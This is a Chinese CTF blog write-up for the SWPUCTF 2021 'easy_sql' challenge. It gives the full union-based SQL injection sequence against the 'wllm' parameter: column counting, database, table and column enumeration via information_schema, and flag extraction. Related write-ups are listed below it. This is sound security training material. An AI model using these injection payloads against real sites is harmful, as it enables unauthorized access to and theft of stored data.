[swpuctf 2021 新生赛]easy_sql

最新推荐文章于 2024-02-10 17:53:39 发布
最新推荐文章于 2024-02-10 17:53:39 发布
阅读量547 收藏 10
点赞数 7
文章标签: sql 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80044238/article/details/135880875
版权

进入页面我们可以看到

让我们输入点东西如图:

屏幕截图 2024-01-26 210829

然后我们可以在url栏上面看到参数是wllm

然后输入参数wllm=1回车如图:

屏幕截图 2024-01-26 213610

下一步猜测字段输入:

?wllm=1 order by 1 -- asd 1,2,3...依次增加直到页面显示查询不到最终发现是三个字段

如图:(是查到第四个字段时查不到的结果)

下一步获取库名输入:?wllm=100' union select 1,database(),3 -- asd

回车如图:

得到库名为:test_db

下一步获取表名输入:

?wllm=100'union select 1, table_name,3 from information_schema.tables where table_schema='test_db' limit 0,1 -- asd

回车如图:(依次获取可知共有两个表)

屏幕截图 2024-01-26 223849

下一步获取列名输入:

?wllm=100'union select 1, column_name,3 from information_schema.columns where table_schema='test_db'and table_name='test_tb'limit 0,1 -- asd

回车如图:(依次获取此表中的列名发现第二个字段便是flag我们直接找它里面的数据即可)

屏幕截图 2024-01-26 224545

下一步直接获取flag中的数据即可

输入:

?wllm=100' union select 1,flag,3 from test_tb -- asd

回车如图:

屏幕截图 2024-01-26 225025

得到flag将其提交即可

如图:

屏幕截图 2024-01-26 225059

OVER!

安全猴想变牛
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[SWPUCTF 2021 新生]easy_sql - 联合注入||报错注入||sqlmap
oZuoShen123的博客
10-06 784
得到:XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终:flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到:XPATH syntax error: ‘~ test_tb,users ~’得到:Your Login name:xxx Your Password:yyy。得到:XPATH syntax error: ‘~ id,flag ~’说明无回显,尝试报错注入。表为:test_db。
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
[SWPUCTF 2021 新生]easy_sql
qq_56301349的博客
07-15 3857
[SWPUCTF 2021 新生]easy_sql
2021莲城杯比题包.zip
10-12
这个比很可能是一个网络安全技术挑战,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全竞模式,参者需要展示他们的信息安全技能,包括但不限于密码学、漏洞分析、逆向工程、网络侦查等。...
easy_VM.rar_easy
09-23
本文将深入探讨一款名为“easy_VM.rar”的简易虚拟机,该虚拟机专为Windows操作系统设计,虽然功能相对简单,但其核心原理和实现方式对于理解虚拟化技术的基础概念具有重要意义。 “easy_VM.rar”是一款轻量级的...
easy_c.zip_easy
09-22
【标题】"easy_c.zip_easy" 是一个专为C语言初学者设计的压缩包,它包含了一系列简单的小型程序,旨在帮助初学者更好地理解和实践C编程基础。这些小程序的目的是让学习过程更加直观和易懂,使初学者能够通过实际操作...
Fujitsu.zip_easy _fujitsu
09-23
《Fujitsu_Easy_Kit试用手记_从入门到精通》 富士通(Fujitsu)是一家全球知名的IT企业,其产品线广泛,涵盖了硬件、软件和服务等多个领域。Fujitsu_Easy_Kit是富士通推出的一款便捷式解决方案,旨在简化用户的IT操作...
CTF刷题第一周
qq_62660611的博客
11-10 1575
第一周刷题记录
SWPUCTF 2021 新生 easy_sql
JasonJiao66的博客
01-28 446
当传1‘时出现报错,我们知道这是一个字符型注入,那么接下来还是先把句尾注释掉,然后使用order by语句,从1开始试,到4时开始报错,那么我们知道其有三个字段。首先打开题目,照片左上角求我们赶紧写一点东西,网站标题中则提升我们应该去传一个wllm的值,我们先给杰哥传一个1,回显正常。将1改为-1后,使用union selec,用户名与密码的位置出现了我们注入得到的2与3,表明这两个位置我们可用。接着继续加入limit n,1用group_concat()函数连接到一行显示来对库进行查询。
[SWPUCTF 2021 新生]easy_sql解题记录
2301_80050903的博客
01-25 573
wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+wllm=1' ,出现报错,说明为字符型漏洞。
[NSSCTF]-Web:[SWPUCTF 2021 新生]easy_sql解析
最新发布
2301_79326813的博客
02-10 944
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值